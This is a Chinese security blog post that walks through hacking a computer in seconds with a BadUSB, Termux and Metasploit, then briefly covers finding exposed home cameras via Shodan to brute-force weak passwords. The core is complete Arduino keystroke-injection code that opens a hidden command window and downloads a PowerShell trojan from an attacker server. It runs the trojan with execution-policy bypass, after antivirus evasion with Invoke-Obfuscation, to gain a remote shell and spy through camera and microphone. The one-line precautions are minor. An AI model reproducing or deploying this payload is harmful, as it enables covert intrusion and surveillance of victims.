网络安全技术分享 _网络安全

利用手机中tertermux ， msf和badusb几秒钟黑掉一台电脑提醒：平时不要在电脑上插入陌生的u盘
准备工具：
1.badusb硬件

文章插图

2.一台手机安装termux
3.一台服务器安装msf
4.cobaltstrike软件， arduino软件
首先我们使用cobaltstrike创建一个可以连接我们服务器msf的powershell木马，利用invoke-obfuscation工具对poweshell木马进行免杀，然后将木马放入到我们的服务器中，
然后用arduino对badusb进行编程

文章插图

将代码上传

#include<Keyboard.h>void setup() {// putpower shell your setup code here, to run onceKeyboard.begin();//开始键盘通讯 delay(3000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500);Keyboard.press('r');//r键delay(500); Keyboard.release(KEY_LEFT_GUI);Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法Keyboard.release(KEY_CAPS_LOCK);delay(700);Keyboard.println("CMD/q /d /f:off /v:on /k MODE con: cols=15 lines=1 ");//无回显 //Keyboard.println("cmd /T:01 /K "@echo off && mode con:COLS=15 LINES=1"");//有回显delay(700);Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); delay(700);Keyboard.println("powershell");delay(700);Keyboard.println("$clnt = new-object system.net.webclient;");delay(700);Keyboard.println("$url= 'http://xxxxx.top/kk.ps1';");//远程服务器ps1远控地址delay(700);Keyboard.println("$file = 'd:\user.ps1';");//下载到目标存放文件的地址delay(700);Keyboard.println("$clnt.downloadfile($url,$file)");//采用分段执行绕过防火墙进程防护delay(700);Keyboard.println("$url= 'http://xxxxx..top/hack.html';");//远程服务器html远控地址delay(700);Keyboard.println("$file = 'd:\hack.html';");//下载到目标存放文件的地址delay(700);Keyboard.println("$clnt.downloadfile($url,$file)");//采用分段执行绕过防火墙进程防护delay(700);Keyboard.println("powershell.exe -executionpolicy bypass -file d:\user.ps1"); //本地权限绕过执行木马脚本delay(700);Keyboard.press(KEY_RETURN);delay(700);Keyboard.release(KEY_RETURN);delay(700);Keyboard.press(KEY_CAPS_LOCK); delay(500);Keyboard.release(KEY_CAPS_LOCK);delay(700);Keyboard.end();//结束键盘通讯 } void loop() {// put your main code here, to run repeatedly: }

badusb的功能就是可以模拟电脑上的键盘和鼠标，如果用户插上badusb ，用户电脑就会执行badusb里的代码，从而下载我们提前制作好的木马。
上述代码大致意思为：最小化窗口运行cmd ，调出powershell ，使用powershell下载指定url的文件，此url就是我们服务器上的木马。
然后我们使用手机termux中的ssh连接服务器并启动msf进行监听。
然后将badusb插入受害者电脑

文章插图

文章插图

可以看到已经获取shell 。我们就可以在受害者不知道的情况下浏览文件，调用摄像头麦克风进行拍照录音，造成隐私泄露
防范：碰到可疑的U盘不要随意插入很可能携带有恶意代码
网络设备弱密码（监控）随着网络以及家用监控的发展，现在很多家庭都会选择在家中安装监控，你不知道的是因为一个弱密码你可能正处在别人的监控当中。
有许多搜索引擎每天都在搜索互联网上的设备，例如：钟馗之眼， shodan

文章插图
搜索到的监控设备
在这些搜索引擎中，可以搜索到互联网上的监控设备，可以访问这些监控的后台管理地址，如果你使用的是弱密码或者厂商的出场默认密码那么很有可能遭到弱密码爆破攻击。从而让你处在别人的监控当中。不仅仅是监控器，所有连接到互联网的设备都有可能暴露在别人眼前。
防范：使用网络设备时使用较为复杂的密码，如果是厂商默认密码要及时更改
vulnhub靶机渗透Vulnhub它是一个提供各种漏洞环境的平台，可以供网络安全学习者进行渗透测试。
我挑选了一个靶机进行详细教学
DC-5